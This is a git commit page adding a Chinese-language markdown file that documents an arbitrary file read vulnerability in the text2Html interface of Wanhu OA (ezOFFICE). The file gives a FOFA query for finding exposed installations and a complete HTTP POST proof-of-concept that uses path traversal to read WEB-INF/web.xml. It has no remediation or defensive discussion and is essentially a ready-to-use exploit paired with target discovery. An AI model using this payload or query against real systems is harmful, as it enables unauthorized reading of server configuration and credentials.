Create 万户OA text2Html接口存在任意文件读取漏洞.md
This commit is contained in:
parent
6e27ddeab3
commit
64c2cd9863
22
万户OA text2Html接口存在任意文件读取漏洞.md
Normal file
22
万户OA text2Html接口存在任意文件读取漏洞.md
Normal file
@ -0,0 +1,22 @@
|
||||
## 万户OA text2Html接口存在任意文件读取漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="万户网络-ezOFFICE"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /defaultroot/convertFile/text2Html.controller HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 63
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
SL-CE-SUID: 1081
|
||||
|
||||
saveFileName=123456/../../../../WEB-INF/web.xml&moduleName=html
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user